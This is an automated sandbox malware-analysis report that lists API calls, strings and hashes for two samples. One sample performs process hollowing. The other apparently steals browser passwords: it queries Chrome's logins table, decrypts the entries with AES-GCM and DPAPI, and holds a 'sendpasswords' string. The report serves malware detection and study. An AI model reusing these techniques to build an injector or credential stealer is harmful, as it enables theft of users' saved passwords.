Function 0040DBBD Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040DBD6

Part of subcall function 0040DEAD: Sleep.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414F5F,?), ref: 0040DED5

__calloc_crt.LIBCMT ref: 0040DBFA
__calloc_crt.LIBCMT ref: 0040DC16
__copytlocinfo_nolock.LIBCMT ref: 0040DC3B
__setlocale_nolock.LIBCMT ref: 0040DC48
___removelocaleref.LIBCMT ref: 0040DC54
___freetlocinfo.LIBCMT ref: 0040DC5B
___removelocaleref.LIBCMT ref: 0040DC88
___freetlocinfo.LIBCMT ref: 0040DC8F

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock
String ID:
API String ID: 1483262949-0
Opcode ID: 0e257c5be681744395716326b04fbe4d115a865b6ec359d6243cde99fb8085b3
Instruction ID: 5b91ec66f61a17bd136130c75f4d9022e7a644fc2cfb177896a2f6328bf06c44
Opcode Fuzzy Hash: 0e257c5be681744395716326b04fbe4d115a865b6ec359d6243cde99fb8085b3
Instruction Fuzzy Hash: 9B21D235508601EAE7227FAADC42D1A7BF4DF91718B20443FF4847A2D2DA3DAC44DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D05A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(00000000), ref: 0040CFC3
___removelocaleref.LIBCMT ref: 0040D000
___freetlocinfo.LIBCMT ref: 0040D019

Strings

pFC, xrefs: 0040CFD0

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: DecrementInterlocked___freetlocinfo___removelocaleref
String ID: pFC
API String ID: 3247270073-3796257259
Opcode ID: e1bec6987670eebf973c37b56c6d5ce43dbbe1253d8ef5884ff4142fbd2649d1
Instruction ID: a498189872aee0b7005028b1247f6523023bed11f110077832b06a90b3a1ec65
Opcode Fuzzy Hash: e1bec6987670eebf973c37b56c6d5ce43dbbe1253d8ef5884ff4142fbd2649d1
Instruction Fuzzy Hash: BE11A331901305DADB306FA59846B1A77A69F44728F20453FF498FB2C2CB3CD981DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041469D Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?), ref: 004146D1
GetLastError.KERNEL32 ref: 004146DB
__alloc_osfhnd.LIBCMT ref: 00414703
__set_osfhnd.LIBCMT ref: 0041472D

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__set_osfhnd
String ID:
API String ID: 1633174738-0
Opcode ID: 1c60bf9ebbe5ba0b8de08884a65dc40613b4e8f9d27a456ed7a86900ca479c69
Instruction ID: 20b72c41b224bea48b6d4439250aff7cb983f2324a796c2b4184417b48f6576a
Opcode Fuzzy Hash: 1c60bf9ebbe5ba0b8de08884a65dc40613b4e8f9d27a456ed7a86900ca479c69
Instruction Fuzzy Hash: B921D6316012059ADB119F65C8057DE7FA0AF87328F18875AE8649B2D2C77C8AC1DF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00428C08 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00428C2E

Part of subcall function 00428A16: __fltout2.LIBCMT ref: 00428A42

__cftog_l.LIBCMT ref: 00428C54
__cftoe_l.LIBCMT ref: 00428C86

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction ID: 241c89a9301580b6e7887e1e223602c0e6bcd1f15f875182ba213080e6c58095
Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction Fuzzy Hash: 3811993214205DBBCF125E85EC01CEE3F26BB18354B98891AFE1855131DB3AC9B1AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00427A10 Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00431E48,00000000,00000000,00000000,00430010,00000000), ref: 00427A48
SetConsoleCursorInfo.KERNEL32(00000000,00000000,00000000), ref: 00427A6A
RtlExitUserThread.NTDLL(00000000), ref: 00427A72
SetFileShortNameA.KERNEL32(00000000,00431E80), ref: 00427A94

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: Name$ConsoleCursorExitFileFullInfoPathShortThreadUser
String ID:
API String ID: 3915137747-0
Opcode ID: b10cfd156464c0ca2c8b894a443df198905b2385de1b1817807ce9cff4f90754
Instruction ID: d035d980575495d5172214b24b9c6d5f6fc78bfe9c6a04701be60deba1f3baa8
Opcode Fuzzy Hash: b10cfd156464c0ca2c8b894a443df198905b2385de1b1817807ce9cff4f90754
Instruction Fuzzy Hash: A101D4716483109BE764A764FC17B6A33B4B748712F90213AF645931D0DF795844CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0040F7C7

Strings

@, xrefs: 0040F2AB
@, xrefs: 0040F732

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: __aulldvrm
String ID: @$@
API String ID: 1302938615-149943524
Opcode ID: 8ac37ede4e14e66e0f839b025727a9e8fe8d9d5cfcb2d69c7678a814be3045f8
Instruction ID: f6e81578e32b952469933d4da95741b6ef3cbfbf3d64340cb7d7322e3e1360b7
Opcode Fuzzy Hash: 8ac37ede4e14e66e0f839b025727a9e8fe8d9d5cfcb2d69c7678a814be3045f8
Instruction Fuzzy Hash: 742184749001589BDB35DE54CC887AAB6B1AB94304F1445FBD109B7782D3B85EC9CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C689 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 0040C6E2
InterlockedIncrement.KERNEL32(00434A98), ref: 0040C70D

Strings

pFC, xrefs: 0040C6EC

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: Interlocked$DecrementIncrement
String ID: pFC
API String ID: 2172605799-3796257259
Opcode ID: c18710712711ec31a6dad53811e2aa17e51cef7fce1f0f290b2c5ac4addb1a95
Instruction ID: 7df651b005818d3f1ed13df5d8aa103c5121289981c5fe45df5d7b365058972a
Opcode Fuzzy Hash: c18710712711ec31a6dad53811e2aa17e51cef7fce1f0f290b2c5ac4addb1a95
Instruction Fuzzy Hash: C101C432D00612DBD721AF959985B9E77A0AB44714F00163BE844733D1CB3DA942DFDD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 820.exePID: 3140, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	44.1%
Dynamic/Decrypted Code Coverage:	86.4%
Signature Coverage:	25%
Total number of Nodes:	44
Total number of Limit Nodes:	8

Executed Functions

Function 053C0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 053C0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 053C016C
CreateProcessA.KERNELBASE(?,00000000), ref: 053C0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 053C0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 053C0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 053C029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 053C02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 053C02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 053C0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 053C032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 053C0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 053C03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 053C03E1
ResumeThread.KERNELBASE(00000000), ref: 053C03ED
ExitProcess.KERNEL32(00000000), ref: 053C0412

Memory Dump Source

Source File: 00000005.00000002.2342220222.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_53c0000_820.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 1d27fe66897b224139bca141f5a038a8c4c36eb4837ba0f49eb95d3d96623630
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 00B1B674A00208EFDB44CF98C895FAEBBB5BF88314F248158E549AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 053C0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 053C0533

Strings

0, xrefs: 053C0492
d, xrefs: 053C0584
mfoaskdfnoa, xrefs: 053C0520, 053C0523
saodkfnosa9uin, xrefs: 053C04DA

Memory Dump Source

Source File: 00000005.00000002.2342220222.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_53c0000_820.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 988d0c1c3a8acaa7c7f290af5457d563c3a550e4d89bfc4e9ee7b9a4e43309e3
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: C4510770D083C8DBEB15CB98C849BADBFB66F11708F144098D5447F286C3BA5A59CB66

Uniqueness

Uniqueness Score: -1.00%

Function 053C05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 053C05EC

Strings

o, xrefs: 053C0600
apfHQ, xrefs: 053C05E2, 053C05E5

Memory Dump Source

Source File: 00000005.00000002.2342220222.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_53c0000_820.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 9f1dfda5dee50fbdb973e30f72cc1054c9f184ae30a6c84678a29b368e31c659
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 0F011E70C0828CEADB14DF98C5183AEBFB5AF41308F1480DDC4592B241D7B69B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 051FA7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 051FA7EE
Module32First.KERNEL32(00000000,00000224), ref: 051FA80E

Memory Dump Source

Source File: 00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 051FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_51fa000_820.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 90e2327fe59d6178ac0eb07bcb8ead040c7235c24dc6e1a361ed3b3884e73b4c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A2F062312007106FD7203BB5A88DE6A76E9BF49626F104628E74B910C0DBB4E8468761

Uniqueness

Uniqueness Score: -1.00%

Function 051FA485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 051FA4D6

Memory Dump Source

Source File: 00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 051FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_51fa000_820.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3d5e68ba006ff17cd91c39deb5a60f0449e4870b47f4e66266a3b78000a54598
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B7113F79A00208EFDB01DF98C985E99BBF5AF08350F058094FA499B361D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 820.exePID: 1412, Parent PID: 3140COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	27
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00694A87 Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___sbh_find_block.LIBCMT ref: 00694AB0
___sbh_free_block.LIBCMT ref: 00694ABF
RtlFreeHeap.NTDLL(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00

Memory Dump Source

Source File: 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4431451107.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_820.jbxd

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
Opcode Fuzzy Hash: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68

Uniqueness

Uniqueness Score: -1.00%

Function 006C5FE7 Relevance: 4.5, APIs: 3, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 006C5FF3

Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8

__endthreadex.LIBCMT ref: 006C6003

Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014

Memory Dump Source

Source File: 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4431451107.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_820.jbxd

Similarity

API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
String ID:
API String ID: 1003287236-0
Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00694A78 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 006999D2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
TerminateProcess.KERNEL32(00000000), ref: 00699A15

Memory Dump Source

Source File: 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4431451107.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_820.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 16E6.exePID: 5340, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	16.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	129

Executed Functions

Function 004121D9 Relevance: 126.4, APIs: 40, Strings: 31, Instructions: 2179encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004122D4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,0054423C), ref: 00412367
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,00000000,?,0054423C), ref: 0041245F
omp_get_thread_num.VCOMP140 ref: 004124E8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041275D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041296F

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

BCryptOpenAlgorithmProvider.BCRYPT(0055D648,AES,00000000,00000000), ref: 00412AF7
GetLastError.KERNEL32 ref: 00412B01
BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00412B23
GetLastError.KERNEL32 ref: 00412B2D
BCryptGenerateSymmetricKey.BCRYPT(Kp,00000000,00000000,?,?,00000000), ref: 00412B5A
GetLastError.KERNEL32 ref: 00412B64
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400), ref: 00412B87
BCryptDecrypt.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,0000000F,?,?,00000000,00000000), ref: 00412C3F
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00412CA7
memmove.VCRUNTIME140(?,?,?), ref: 00412CC9
memmove.VCRUNTIME140(?,?,?), ref: 00413150
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,Function_00144378,00000000), ref: 004134E6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,Function_00144378,00000000), ref: 00413524

Part of subcall function 004021C0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one.,00000068), ref: 00402236
Part of subcall function 004021C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040226B

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004135E5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004136E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 0041373E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00413954
memset.VCRUNTIME140(?,?,?,00000000,?,?,?,?,?,?,?,?,?,000000B0), ref: 0041398D
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,.txt,?,?,?,?,?,?,?,?,?,?,\Temp\,?), ref: 004139F3
memset.VCRUNTIME140(?,00000000), ref: 00413A11
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000038,?,?,?,?,?,?,00000108,.txt), ref: 00413BAA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,hwid,00000004,?,?,?,?,?,?,?,00000038), ref: 00413C53
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,name,00000004,?,?,?,?,?,hwid,00000004), ref: 00413D02
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,log,00000003,?,?,?,?,?,name,00000004), ref: 00413DB1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00413EC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000005), ref: 0041403E
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0041413D
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(?,?,?), ref: 00414161
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00414181
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0041418D
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00414199
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041427D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00414337
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00545CD8,00000000), ref: 00414373

Part of subcall function 004106F0: MultiByteToWideChar.KERNEL32(00000000,00000002,?,?,00000000,00000000,3A5313C3,?), ref: 00410742
Part of subcall function 004106F0: MultiByteToWideChar.KERNEL32(00000000,00000002,?,?,00000000,00000000,00000000,?,?,00000000,00000000,3A5313C3,?), ref: 00410811
Part of subcall function 004106F0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041083B

Part of subcall function 00404840: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,0040254F,?,?,https://,https://,https://,?,?), ref: 004048B7

Strings

sendpasswords, xrefs: 00413EFC
[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 00412B6B
[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 00412B34
BT, xrefs: 0041410D
AES, xrefs: 00412AEB
Login: , xrefs: 00412FD0
Password: , xrefs: 0041303B
\Temp\tmp, xrefs: 0041250C
SELECT origin_url, username_value, password_value FROM logins, xrefs: 004129B3
count, xrefs: 00413DD3
ChainingModeGCM, xrefs: 00412B13
hxCT, xrefs: 00413488
\Temp\, xrefs: 0041355F
!, xrefs: 004141DD
]@, xrefs: 00414102
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 00412B08
Host: , xrefs: 00412F68
idb, xrefs: 00413B0E
SC, xrefs: 00413A21
hwid, xrefs: 00413BBC
_Password_, xrefs: 004137A7
Qh<BT, xrefs: 004122E4
log, xrefs: 00413D14
@, xrefs: 00412C17
Qh\T, xrefs: 004123F7
Kp, xrefs: 00412B4F
.txt, xrefs: 00413820
ChainingMode, xrefs: 00412B18
e_user, xrefs: 00413B49, 00413B65
name, xrefs: 00413C65
@J@, xrefs: 0041412B

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$D@std@@@std@@U?$char_traits@memmove$Crypt$ByteCharErrorLastMultiWide$memset$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?eback@?$basic_streambuf@?setg@?$basic_streambuf@?setstate@?$basic_ios@AlgorithmD00@DataDecryptGenerateOpenPropertyProviderSymmetricUnprotectXbad_function_call@std@@mallocomp_get_thread_num
String ID: Login: $Password: $!$.txt$@$@J@$AES$ChainingMode$ChainingModeGCM$Host: $Qh<BT$Qh\T$SELECT origin_url, username_value, password_value FROM logins$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\$\Temp\tmp$_Password_$count$e_user$hwid$hxCT$idb$log$name$sendpasswords$BT$Kp$SC$]@
API String ID: 786641502-2877932998
Opcode ID: 271ba174ee22eec3dc9865f37236d7d438d27d4eb5701e7280d2f132180e55b3
